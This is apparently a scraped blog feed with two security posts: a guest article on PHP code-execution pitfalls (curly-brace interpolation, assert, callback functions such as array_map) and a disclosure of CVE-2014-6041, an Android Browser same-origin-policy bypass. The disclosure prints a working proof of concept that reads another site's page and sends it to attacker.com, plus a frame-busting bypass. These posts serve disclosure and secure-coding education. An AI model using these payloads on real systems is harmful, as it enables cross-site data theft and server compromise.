http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all<br />
<br />
http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/<br />
<br />
http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/a-tale-of-another-sop-bypass-in-android.html";
</script>Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com3tag:blogger.com,1999:blog-3121270199089759062.post-38198963834326646392014-09-20T11:39:00.002-07:002020-05-27T14:34:59.658-07:00Indepth Code Execution in PHP: Part Two<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOug2ZnojyH1QIH_XVXWFTm6v0JP85Fdb3rUDpBpL-0Id61C2hC4hO-mGpDPgbduQE3C7pjBEtLo2YLBSnwLDttIc1RZVNLgYC3E-ATUouk18qlWi57985irleqKNZhjkfi3XFcffPng/s1600/phpbugs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOug2ZnojyH1QIH_XVXWFTm6v0JP85Fdb3rUDpBpL-0Id61C2hC4hO-mGpDPgbduQE3C7pjBEtLo2YLBSnwLDttIc1RZVNLgYC3E-ATUouk18qlWi57985irleqKNZhjkfi3XFcffPng/s1600/phpbugs.PNG" height="185" width="320" /></a></div>
<br />
This is a continued post from Code Execution in PHP; you can read the first post <a href="http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html" target="_blank">here</a>, so if you haven't read that before please go ahead and read it first or else you would have problem understanding the second part.<br />
<br />
“…It’s no secret that PHP is an easy language to which anyone with amateur coding skills could work with and as a rule with poor knowledge of basic security concepts, this factor alone often lead to new poorly written web-applications; Thus compromising their hosts and extraction of sensitive information. Recently, I was on a pentest for a project to which I was working on and went noticing unusual type of code execution. I decided to write about Code Execution Indepth because the developers need to focus on their poorly written web applications in PHP. This article will try covering code execution flaws in places which are less predictable and detail on snippets of code which might look secure while providing possibilities for ‘code injection’...”<br />
<br />
<a name='more'></a><br />
<br />
In the earlier article, I tried covering practical examples which could potentially lead to Remote Command Execution (RCE) in PHP. Now let’s discuss about some other methods/mistakes which a PHP developer might just had done in writing his/her web application.<br />
<br />
<h4 style="text-align: left;">
Curly Braces:</h4>
<div style="text-align: left;">
They say curly syntax is meant to separate code from strings. In contrast to this view, what it actually does is, ‘embed’ it. As in PHP manual pages written, it means that it would allow to use complex expressions (too complex but let’s just stick with minimal complexity for the sake of the demonstration).<br />
<br />
Imagine Curly braces being used this way:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
If(isset($_GET['year']){<br />
$year=$_GET['year'];<br />
$finalizae="My birthday is 19{'year}.";<br />
print $finalize<br />
?></blockquote>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3AmBJ1nBS4Cj0l3qnEhBt7DMsXW5dGMNa4v-BvTmdgyUZhbK68aCLmkDqrtirCYl5gOZu7mykp3p7i-hjnvhqXFkAp285v8o8mvnqUOZIqEmOcbgM0I4YPyzkg74h6_EDzhMzvVVKaHv/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3AmBJ1nBS4Cj0l3qnEhBt7DMsXW5dGMNa4v-BvTmdgyUZhbK68aCLmkDqrtirCYl5gOZu7mykp3p7i-hjnvhqXFkAp285v8o8mvnqUOZIqEmOcbgM0I4YPyzkg74h6_EDzhMzvVVKaHv/s1600/1.PNG" /></a></div>
<div style="text-align: left;">
<br />
The code used is supposed to ‘echo’ out the year variable (97) embedded inside “My birthday is 19xx” so an user had to submit ‘12’ to the ‘year’ as an input, it code would print out or ‘echo’, “My birthday is 1912”<br />
<br />
Maliciously submitting an input such as ‘dir’ would end up listing files and folders of current directory when $finalize is called in the realm of PHP. This in turn would provide vivid information to a web attacker. Other commands are possible, I had just used ‘dir’, to be reliably simple enough!<br />
<br />
Let’s imagine cases like:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
$brief="I was here until ${`dir`} appeared here";</blockquote>
<div style="text-align: left;">
<br />
From the aforementioned code, ‘dir’, the system command would get executed. Wow. Why did that happen? Well, the code between curly braces will be evaluated and result will replace {`dir`} thus ending up creating a variable. That is the absolute reason why if this one PHP will be complaining about undefined PHP variable. What happened is fairly similar to:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
<?php<br />
eval("$brief");<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkDmC9go7_sEzWJA3Szin2qtvZiDS6xEMxN03vTRBO6It2L9gm9DiIlOVK5KlpDcQ4z4c2X6DcP9KGEB6JO9lhdUNc2_ybTOjq6wHOxdKAwbHxNW3mWOfSph5K1m8paqa9ymk66k3F23g/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkDmC9go7_sEzWJA3Szin2qtvZiDS6xEMxN03vTRBO6It2L9gm9DiIlOVK5KlpDcQ4z4c2X6DcP9KGEB6JO9lhdUNc2_ybTOjq6wHOxdKAwbHxNW3mWOfSph5K1m8paqa9ymk66k3F23g/s1600/3.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
“$breif” is a result of the “dir” command as a string, similar malicious case for an web attacker to execute commands and ex-filtrate information would be:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
<?php<br />
$name='phpinfo';<br />
${name}();<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGtKVaqlO0hb5td3354HFpU2S8CPXPJP1rSW7uChb-9lGsU4tPOCa0Y1Ry_OmZrDPDAjcLGpH5iDTbZq9LcuK18H4fgUDNpCwnKFyfzHh4bjMvAoCN4RCbM-lPDLdCAQa-FyCxsMgm52SW/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGtKVaqlO0hb5td3354HFpU2S8CPXPJP1rSW7uChb-9lGsU4tPOCa0Y1Ry_OmZrDPDAjcLGpH5iDTbZq9LcuK18H4fgUDNpCwnKFyfzHh4bjMvAoCN4RCbM-lPDLdCAQa-FyCxsMgm52SW/s1600/4.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
If the above example for example stored name as the username and our username submitted was ‘phpinfo’, what happened as per the malicious request submitted as a payload leads to command execution revealing sensitive information disclosure. </div>
<h4 style="text-align: left;">
Other Cases:</h4>
<div style="text-align: left;">
<br />
There are functions such as assert() which could be equally exploited but is rarely known to the web developers, it is often found on CTF challenges, same thing as the eval function. </div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
$name='phpinfo()';<br />
assert($name);<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsgn3dH0nhDEuY9LWjkahZv_nzUzUdwCQTFe2xfGOfZn8cGztmFk9qAD1g1Z0S-avP2MgkwZlzW_qjh9VkCmjd_iI1qgHaviiwqwt837KN-NdmpEsyqqiFzJNqI5vVquxkjY2UZCAQzqLj/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsgn3dH0nhDEuY9LWjkahZv_nzUzUdwCQTFe2xfGOfZn8cGztmFk9qAD1g1Z0S-avP2MgkwZlzW_qjh9VkCmjd_iI1qgHaviiwqwt837KN-NdmpEsyqqiFzJNqI5vVquxkjY2UZCAQzqLj/s1600/5.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
Assert is designed to help with debugging and not evaluation, thus, leading to command execution. So if you use assert in a user supplied input which you think is trustable, probability is your code might just be vulnerable to Remote Code Execution (RCE) using malicious payloads by users of the application you trust.<br />
<br />
Developers can use array functions to apply some list of properties to data or reverse. In most cases applying functions are predefined, and these types of vulnerabilities are not ‘almost’ known to the public or is limited by knowledge.<br />
<br />
Anyway, These are the array functions I had been dealing with which could lead to RCE:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
array_intersect_uassoc(), usort(), uksort(), array_filter(),<br />
array_diff_uassoc(), array_diff_ukey(), array_reduce(),<br />
array_udiff(), array_udiff_assoc(), array_udiff_uassoc(),<br />
array_intersect_assoc(), array_uintersect(), array_uintersect_assoc(),<br />
array_uintersect_uassoc(), array_walk(), array_walk_recursive() ,<br />
uasort(), array_map()</blockquote>
<div style="text-align: left;">
<br />
In short, don’t use those with a user supplied input unless sanitized properly in PHP. The formula for an almost secure web application is to never trust input from users!<br />
<br />
Let’s take the last function for an example (array_map) and exploit it:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
$evil =$_GET['name'];<br />
$some_array=array(0,1,2,3);<br />
$new_array=array_map($evil,$some_array);<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ3ToZy3BFCzR4qvXgzoCjWG32OJ6Sh6YTcP4ywz3hcxqK9F3r8R2SJRCrd62yh_Tjk0AtAUYTtR6fZA_xGIPYkCCPwVNEgaTCA_hub65CJNx7Gvi3v26i3Hbv6uvCENqGCT0BWEM9goVc/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ3ToZy3BFCzR4qvXgzoCjWG32OJ6Sh6YTcP4ywz3hcxqK9F3r8R2SJRCrd62yh_Tjk0AtAUYTtR6fZA_xGIPYkCCPwVNEgaTCA_hub65CJNx7Gvi3v26i3Hbv6uvCENqGCT0BWEM9goVc/s1600/6.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
Honestly, this is a rare snippet of code but just to prove the point behind mysterious remote code execution attacks, grab me an opportunity to explain what it does! It receives a parameter called ‘name’ via GET request and use this parameter to map it into an array called ‘$some_array’. But the function is also designed to execute call backs to functions. Developers using insecure coding practices do not realize this, thus leading to RCE exploitation with exploits like the following demonstrated:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
http://localhost/index.php?name=phpinfo</blockquote>
<div style="text-align: left;">
<br />
The payload ‘phpinfo’ will be executed and the resultant would be a remote code execution bug which persists due to insecure coding practices. This theory is practical but there is a limitation. The limitation being, only we can call already written functions like phpinfo() or uname() but can’t write a code to be executed other than call functions.<br />
<br />
These other functions are using callbacks, but they are not array based like previous once. They can however be used to create situations like demonstrated before in this article, so do not use them in user supplied input.</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
stream_filter_register(), set_error_handler()<br />
register_shutdown_function(), register_tick_function()</blockquote>
<div style="text-align: left;">
<br />
And some other XML functions by default enabled in php:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>·xml_set_character_data_handler()</li>
<li>·xml_set_element_handler()</li>
<li>·xml_set_end_namespace_decl_handler()</li>
<li>·xml_set_external_entity_ref_handler()</li>
<li>·xml_set_notation_decl_handler()</li>
<li>·xml_set_default_handler()</li>
</ul>
<div style="text-align: left;">
<br />
or pretty much, xml_set_*_*()<br />
<br />
Remember: function call backs/functions using them are good! However in certain cases they are very bad for the logic of the application to behave as we had witnessed in this article. Most of the issues covered weren’t vulnerabilities. Infact, they were features of PHP. But, from improper usages of these *features*, the worse can happen and could lead to existence of potential vulnerabilities tossing up an opportunity for a <a href="http://blog.czarsecurities.com/1077/9-5-job-is-too-old-school-for-a-hacker-meet-shritam-bhowmick/" target="_blank">web attacker</a> to compromise the security of an application. Please be wise and read the manual of a (new) function before implementing in on a practical code and running them on production servers.<br />
<br />
Happy Hacking!</div>
<h4 style="text-align: left;">
About the Author </h4>
<div style="text-align: left;">
This following article is a guest post by Paulos Yibelo. Yibelo is the newest member of RHA family. He is a full time PHP coder and most of his research is involved with application security. In his free time he loves writing articles related to application security <a href="http://paulosyibelo.blogspot.com/" target="_blank">http://paulosyibelo.blogspot.com/</a>.</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/indepth-code-execution-in-php-part-two.html";
</script>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-44480108342468873102014-08-31T02:33:00.000-07:002020-05-27T14:35:22.150-07:00Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" height="150" width="320" /></a></div>
<h4>
Introduction</h4>
Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another.<br />
<a name='more'></a><br />
<h4>
SOP Bypass</h4>
A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser. <br />
<u><br /></u>
<u><b>Update: </b>Other folks have verified this issue to work under Android browser < 4.4. Ref - <a href="https://github.com/rapid7/metasploit-framework/pull/3759" rel="nofollow" target="_blank">https://github.com/rapid7/metasploit-framework/pull/3759</a></u><br />
<br />
The following is a proof of concept:<br />
<h4>
Proof Of Concept </h4>
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test"<br />
onclick="window.open('\u0000javascript:alert(document.domain)','test')" ><br />
<br />
As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.<br />
<span style="background-color: white; box-sizing: border-box; color: red; font-family: Consolas, 'Lucida Console', monospace; font-size: 12px; line-height: 12px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; box-sizing: border-box; color: red; font-family: Consolas, 'Lucida Console', monospace; font-size: 12px; line-height: 12px; white-space: pre-wrap;">Blocked a frame with origin "<a class="webkit-html-external-link" href="http://jsbin.com/" style="box-sizing: border-box; color: #545454; cursor: pointer; text-decoration: none;" target="_blank" title="http://jsbin.com">http://jsbin.com</a>" from accessing a frame with origin "<a class="webkit-html-resource-link" href="http://www.rhainfosec.com/" style="box-sizing: border-box; color: #545454; cursor: pointer;" title="http://www.rhainfosec.com">http://www.rhainfosec.com</a>". Protocols, domains, and ports must match.</span><span style="background-color: white; color: red; font-family: Consolas, 'Lucida Console', monospace; font-size: 12px; line-height: 12px; white-space: pre-wrap;"> </span><br />
<div class="console-group console-group-messages" style="-webkit-text-stroke-width: 0px; background-color: white; box-sizing: border-box; color: #222222; font-family: Consolas, 'Lucida Console', monospace; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; position: relative; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="console-message-wrapper" style="box-sizing: border-box; display: flex;">
<div class="console-message console-error-level" style="border-bottom-color: rgb(240, 240, 240); border-bottom-style: solid; border-bottom-width: 1px; box-sizing: border-box; clear: right; flex: 1 1 auto; margin-left: 24px; min-height: 16px; padding: 1px 22px 1px 0px; position: relative;">
<ol class="outline-disclosure" style="-webkit-padding-start: 12px; box-sizing: border-box; font-size: inherit; line-height: 12px; list-style-type: none; margin: 0px; outline: none; padding-left: 0px;" tabindex="0">
<li class="parent selected" style="box-sizing: border-box; margin-left: -12px; margin-top: 1px; padding: 0px 0px 0px 14px; word-wrap: break-word;" title=""><span class="console-message-text source-code" style="box-sizing: border-box; color: red !important; font-family: Consolas, 'Lucida Console', monospace; font-size: 12px !important; white-space: pre-wrap;"><a class="console-message-url webkit-html-resource-link" href="https://www.blogger.com/null" style="box-sizing: border-box; color: #545454; cursor: pointer; float: right; margin-left: 4px; max-width: 100%; text-align: right; text-decoration: underline;" title="http://jsbin.com/vagugebiweja:7">vagugebiweja:7</a></span></li>
</ol>
</div>
</div>
</div>
<br />
However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.<br />
<br />
I created the following POC, so you can mess around with some stuff:<br />
<h4>
Reading the response</h4>
You can read the response of any page by accessing the document.body.innerHTML property.<br />
<br />
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test"<br />
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" ><br />
<div>
<h4>
Reading the response and sending it to an attackers domain</h4>
In real world situation an attacker would send the response to his controlled domain. </div>
<div>
<b><br /></b></div>
<div>
<iframe name="test" src="http://www.rhainfosec.com"></iframe><br />
<input type=button value="test"<br />
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" ><br />
<div>
<h4>
Bypassing Frame Busting Code</h4>
A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.<br />
<br /></div>
<div>
<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe><br />
<input type=button value="test"<br />
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" ><br />
<br />
<b>Update: </b>A metasploit module has been released by jvennix-r7 which also supports x-frame-options bypass making it a completely universal exploit. <b>Ref - <a href="https://github.com/rapid7/metasploit-framework/pull/3759" rel="nofollow" target="_blank">https://github.com/rapid7/metasploit-framework/pull/3759</a></b></div>
</div>
<div>
<div>
<h4>
Affected Versions</h4>
The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.<br />
<br />
The following are some of the smartphones i tested with browserstack.com.<br />
<h4>
Samsung Galaxy S3</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoqQAJZIz-1PzksM_gVNpojgnOt5locM1g-Gr7q2HHr93OpMeefbdU6v8xss0M5zK46W5a-7eSKXAytb3lWKkNnFOhzPneBw06D0ET2AMh9cjQEsqECnJgAo21GfovFTusnGQYv3HuNs/s1600/aaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoqQAJZIz-1PzksM_gVNpojgnOt5locM1g-Gr7q2HHr93OpMeefbdU6v8xss0M5zK46W5a-7eSKXAytb3lWKkNnFOhzPneBw06D0ET2AMh9cjQEsqECnJgAo21GfovFTusnGQYv3HuNs/s1600/aaa.png" height="640" width="330" /></a></div>
<b><br /></b></div>
</div>
<h4>
Motrorolla Razr</h4>
<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2UbDHqfKacHKLyIIcqYTuBhM42mOIp0A_GcAbnMskY-c9CJpwilhHFwnsDDVnqNyeOfUSaQ9t7IVCh4xFqSRzqjpyTJzqsiFm90in5YqOG75ZQGAATanQeyGDjFe4rFH0cmcGqhkGWTA/s1600/aa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2UbDHqfKacHKLyIIcqYTuBhM42mOIp0A_GcAbnMskY-c9CJpwilhHFwnsDDVnqNyeOfUSaQ9t7IVCh4xFqSRzqjpyTJzqsiFm90in5YqOG75ZQGAATanQeyGDjFe4rFH0cmcGqhkGWTA/s1600/aa.png" height="640" width="342" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Sony Xperia Tipo</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrb2w86od3v1QUWcfbW-J2-QHafcnP9FwcGF_m6UOCWYgCs5UvID6wibi8Ib4GoAxV_mhXrsr51EMLWM94R384P_kwYuwK5EwPZF2kqQku27ldLLwLV03rp5o6eH4h2mD-O2DxTTS6nE/s1600/aaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrb2w86od3v1QUWcfbW-J2-QHafcnP9FwcGF_m6UOCWYgCs5UvID6wibi8Ib4GoAxV_mhXrsr51EMLWM94R384P_kwYuwK5EwPZF2kqQku27ldLLwLV03rp5o6eH4h2mD-O2DxTTS6nE/s1600/aaaa.png" height="640" width="364" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<h4>
HTC Evo 3D and Wildfire </h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhF-PqtaE3yZ53wT6p4yy9uFTPiTnhfAKuYN5SnSEnopVwp4kISmjjq-ABUEAvL0_lfSIJu0R_lejo-rGQlXOdCNnaN5rMVQxidi9HkZlveK4Tgks5MSC4_pITKj8tOw3V_rcF4MwsWY/s1600/htc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhF-PqtaE3yZ53wT6p4yy9uFTPiTnhfAKuYN5SnSEnopVwp4kISmjjq-ABUEAvL0_lfSIJu0R_lejo-rGQlXOdCNnaN5rMVQxidi9HkZlveK4Tgks5MSC4_pITKj8tOw3V_rcF4MwsWY/s1600/htc.png" height="640" width="342" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hope you enjoyed it, Until next time. Pass the comments. </div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Updates</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Haru Sugiyama has posted found an additional technique to read local files using this trick, To learn about it, please visit here - <a href="http://t.co/mGoVU1RWjf">http://t.co/mGoVU1RWjf</a></li>
<li>Posted about a second SOP bypass vulnerability - <a href="http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html" rel="nofollow" target="_blank">http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html</a></li>
<li>A Content Security Policy bypass was also posted in browsers prior to 4.4 by abusing nullbytes - https://twitter.com/AndroidTamer/status/521494552574582784</li>
</ul>
</div>
<h4>
Press Coverage</h4>
http://threatpost.com/flaw-in-android-browser-allows-same-origina-policy-bypass/108265#comment-317786<br />
<br />
https://showyou.com/v/y-yY23sS6DoEs/android-browser-vulnerability-security-now-473<br />
<br />
https://securitystreet.jive-mobile.com/#jive-document?content=%2Fapi%2Fcore%2Fv2%2Fposts%2F6804<br />
<br />
http://www.theregister.co.uk/2014/09/16/three_quarters_of_droid_phones_open_to_web_page_spy_bug/<br />
<br />
http://linustechtips.com/main/topic/216087-metasploit-major-android-bug-is-a-privacy-disaster-cve-2014-6041/<br />
<br />
http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/<br />
<br />
http://www.forbes.com/sites/thomasbrewster/2014/09/16/widespread-android-vulnerability-a-privacy-disaster-claim-researchers/<br />
<br />
http://www.securityweek.com/dangerous-same-origin-policy-bypass-flaw-found-android-browser<br />
<br />
http://www.computerworld.com/article/2684059/many-android-devices-vulnerable-to-session-hijacking-through-the-default-browser.html<br />
<br />
http://gadgets.ndtv.com/mobiles/news/android-browser-security-hole-affects-millions-of-users-says-expert-592578<br />
<br />
http://www.bostonglobe.com/business/2014/09/15/rapid-boston-finds-android-flaw/JJ9iHJB6YTcs10a7O9TjpN/story.html<br />
<br />
http://www.digit.in/mobile-phones/android-security-flaw-affects-millions-of-users-23921.html<br />
<br />
http://www.phonearena.com/news/New-Android-bug-called-a-privacy-disaster_id60750<br />
<br />
http://www.scmagazine.com/android-bug-allowing-sop-bypass-a-privacy-disaster-researcher-warns/article/371917/<br />
<br />
http://arstechnica.com/security/2014/09/android-browser-flaw-a-privacy-disaster-for-half-of-android-users/<br />
<br />
http://thehackernews.com/2014/09/new-android-browser-vulnerability-is.html<br />
<br />
http://xakep.ru/news/aosp-browser-sop/<br />
<br />
http://blog.trendmicro.com/trendlabs-security-intelligence/same-origin-policy-bypass-vulnerability-has-wider-reach-than-thought/<br />
<br />
http://daily.urdupoint.com/livenews/2014-09-17/news-303641.html<br />
<br />
http://dailypakistan.com.pk/daily-bites/17-Sep-2014/144263<br />
<br />
http://e.jang.com.pk/09-24-2014/karachi/page16.asp<br />
<br />
http://tribune.com.pk/story/764713/online-security-pakistani-helps-google-avoid-privacy-disaster/<br />
<br />
http://www.dawn.com/news/1133178/pakistani-researcher-reveals-privacy-flaw-in-android-browsers <br />
<br />
http://tribune.com.pk/story/764925/credit-to-our-white-hats/<br />
<br />
http://propakistani.pk/2014/09/23/pakistani-researcher-helps-google-preventing-massive-security-disaster/<br />
<br />
http://www.makeuseof.com/tag/this-android-browser-bug-will-make-you-upgrade-to-kitkat/</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/android-browser-same-origin-policy.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com15